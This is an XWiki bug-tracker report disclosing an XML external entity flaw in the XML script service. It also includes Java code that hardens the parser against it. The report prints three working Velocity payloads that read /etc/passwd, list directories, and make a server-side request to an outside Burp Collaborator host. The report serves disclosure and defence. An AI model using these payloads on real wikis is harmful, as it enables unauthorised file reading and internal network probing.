XWiki Platform: XWIKI-18946

XML External Entity Injection (XXE) through XML script service


    Details

    • Tests:
      Unit
    • Difficulty:
      Unknown
    • Documentation in Release Notes:
      N/A
      Description

      Any user with Velocity script permission can read arbitrary files, list directories and perform server-side request forgery (SSRF), because the XML script service resolves external entities.

      • Read arbitrary files payload:

        {{velocity}}
        #set($xml=$services.get('xml'))
        #set($xxe_payload = "<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root[<!ENTITY xxe SYSTEM 'file:///etc/passwd' >]><root><foo>&xxe;</foo></root>")
        #set($doc=$xml.parse($xxe_payload))
        $xml.serialize($doc)
        {{/velocity}}

      • Directory listing payload:

        {{velocity}}
        #set($xml=$services.get('xml'))
        #set($xxe_payload = "<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root[<!ENTITY xxe SYSTEM 'file:///' >]><root><foo>&xxe;</foo></root>")
        #set($doc=$xml.parse($xxe_payload))
        $xml.serialize($doc)
        {{/velocity}}

      • SSRF payload:

        {{velocity}}
        $services.get('xml').parse("<!DOCTYPE test [ <!ENTITY xxe SYSTEM 'http://ao2r99e546em76d8rliq7hcil9rzfo.burpcollaborator.net/a'> ]>
        <productId>&xxe;</productId>")
        {{/velocity}}
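      All three payloads rely on the parser honouring a DOCTYPE with an external entity. The following is an added example (not XWiki's code or its fix for this issue) showing how a JAXP DocumentBuilderFactory is hardened so the first payload above is rejected before any entity is resolved; the class and method names are my own.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXException;

public class HardenedXmlParse {

    // Constructed sample input: the file-read payload from this report.
    static final String XXE_PAYLOAD =
        "<?xml version='1.0' encoding='UTF-8'?>"
        + "<!DOCTYPE root[<!ENTITY xxe SYSTEM 'file:///etc/passwd' >]>"
        + "<root><foo>&xxe;</foo></root>";

    /** Factory that refuses DOCTYPE declarations, which blocks all entity-based XXE. */
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // Primary control: no DOCTYPE at all (covers general and parameter entities).
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth, in case the DOCTYPE rule is ever relaxed by a caller.
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf;
    }

    /** Returns true when the input is accepted, false when the hardened parser rejects it. */
    static boolean accepts(String xml) throws Exception {
        DocumentBuilder db = hardenedFactory().newDocumentBuilder();
        try {
            Document d = db.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return d != null;
        } catch (SAXException e) {
            // Xerces reports a SAXParseException saying the DOCTYPE is disallowed.
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("XXE payload accepted: " + accepts(XXE_PAYLOAD));
        System.out.println("plain document accepted: " + accepts("<root><foo>ok</foo></root>"));
    }
}
```

      With this configuration the payload fails at the DOCTYPE, so file:// and http:// entities are never fetched, while documents without a DOCTYPE still parse normally.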

              People

              Assignee:
              tmortagne Thomas Mortagne
              Reporter:
              PetrusViet Petrus Viet (a member of VNG Security)